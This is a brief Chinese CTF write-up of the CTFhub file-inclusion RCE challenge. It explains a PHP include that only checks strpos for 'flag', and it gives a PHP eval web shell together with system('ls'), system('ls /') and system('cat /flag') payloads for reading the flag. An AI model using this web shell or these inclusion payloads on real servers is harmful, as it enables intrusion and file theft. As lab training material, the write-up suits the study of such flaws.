CTFhub-RCE-文件包含
访问网站
我们仔细看一下php代码,重点是
if (!strpos($_GET["file"], "flag")) {
include $_GET["file"];
这里有一个strpos(string,find,start)函数
意思在string字符串中找find的位置,start是查找的开始位置
那么这句代码的意思就是如果file中没有flag字符串就执行下面的include $_GET["file"]
否则就输出Hacker。
点击shell :
<?php eval($_REQUEST['ctfhub']);?>
是将ctfhub传的参数用php执行
题目的目的也是让我们执行shell木马那么我们就
在网站后输入:
?file=shell.txtshell中要传的参数为 ctfhub=system("ls"); (hackbar 的 body 的参数)
点击 hackbar 中的
接着返回上一级目录,发现flag: ctfhub=system("ls /");
点击 hackbar 中的
接下来打开flag : ctfhub=system("cat /flag");
点击 hackbar 中的
